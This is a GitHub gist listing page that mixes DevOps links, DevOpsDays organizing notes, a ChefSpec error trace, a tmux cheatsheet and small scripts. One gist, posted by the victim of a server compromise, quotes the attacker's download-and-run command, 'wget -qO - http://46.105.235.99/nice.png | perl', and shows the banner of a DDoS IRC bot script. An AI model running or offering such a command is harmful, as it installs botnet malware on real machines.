Skip to content

Instantly share code, notes, and snippets.

View wickett's full-sized avatar
💭
I may be slow to respond.

James Wickett wickett

💭
I may be slow to respond.
View GitHub Profile
@ryanaslett
ryanaslett / nice.pl
Last active March 13, 2017 00:39
Some shitlord thought they'd turn my box into an IRC DDOS machine. /bin/bash -c wget -qO - http://46.105.235.99/nice.png | perl
#!/usr/bin/perl
######################################################################################################################
######################################################################################################################
## DDoS Perl IrcBot v1.0 / 2012 by DDoS Security Team ## [ Help ] ###########################################
## Stealth MultiFunctional IrcBot writen in Perl #######################################################
## Teste on every system with PERL instlled ## !u @system ##
## ## !u @version ##
## This is a free program used on your own risk. ## !u @channel ##
## Created for educational purpose only. ## !u @flood ##

The Network The Next Frontier for Devops http://www.slideshare.net/botchagalupe/sdn-and-devops

Cumulus Networks: A Sneak Preview of One of My Favorite Startups - James Hamilton Blog http://perspectives.mvdirona.com/2013/06/18/CumulusNetworksASneakPreviewOfOneOfMyFavoriteStartups.aspx

Stanford Seminar - Software-Defined Networking at the Crossroads http://www.youtube.com/watch?v=WabdXYzCAOU

NetworkStatic | Brent Salisbury Blog http://networkstatic.net/

Network World: A conversation with Kelly Wanser, CEO of Stateless Networks http://www.statelessnetworks.com/network-world-a-conversation-with-kelly-wanser-ceo-of-stateless-networks/

@agoddard
agoddard / dod_global_thoughts.md
Created September 8, 2013 19:49
DoD Global thoughts

DevOpsDays Global disccusion August '13

@geekle & @anthonygoddard (Melbourne represent yo.)

decentralization

We talked about the need to decentralize DoD as much as possible, with the aim of reducing dependence on Patrick for the small stuff, letting him concentrate on the Big Stuff™

But we need to stay true to what makes DoD awesome

herinlies the challenge. One idea we discussed was to follow the "TEDx" model, where independent organizers are given a time-limited 'license' to run a single event. The license is applied for online, approved by core-organizers who can run through a simple checklist (is the event name too ambiguous (devopsdays USA, devopsdays california, is the event scheduled too close to another geographically close event etc) and in applying for the license, the licensee has to agree to some simple terms (tickets must be available to the general public, videos must be recorded of the talks, tickets mustn't cost more than $x, no vendor talks etc). Licenses would be simple to renew,

@maraca
maraca / output
Last active December 20, 2015 04:59
ChefSpec cannot load such file -- rvm
LoadError
---------
cannot load such file -- rvm
Cookbook Trace:
---------------
/home/martin/application-cookbook/vendor/cookbooks/rvm/recipes/default.rb:25:in `require'
/home/martin/application-cookbook/vendor/cookbooks/rvm/recipes/default.rb:25:in `from_file'
/home/martin/application-cookbook/vendor/cookbooks/rvm/recipes/system_install.rb:20:in `from_file'
/home/martin/application-cookbook/vendor/cookbooks/rvm/recipes/system.rb:20:in `from_file'
@marksim
marksim / README.md
Last active September 28, 2018 15:56
Pair Sessions Script Adding more security (automatically timeout sudo, append the command to each ssh key

My script for pair sessions on my box.

What it does

  • downloads the appropriate ssh keys from github
  • copies the appropriate 'ssh pair@your-external-ip' command to your clipboard (see Note #1)
  • sets up the tmux session
  • cleans up the session, and the keys after it's done

How to use

@ceme
ceme / bash_curl_loop
Last active January 19, 2023 13:07
bash curl loop
while true; do sleep 1; curl http://www.google.com; echo -e '\n\n\n\n'$(date);done
@MohamedAlaa
MohamedAlaa / tmux-cheatsheet.markdown
Last active July 4, 2024 17:58
tmux shortcuts & cheatsheet

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname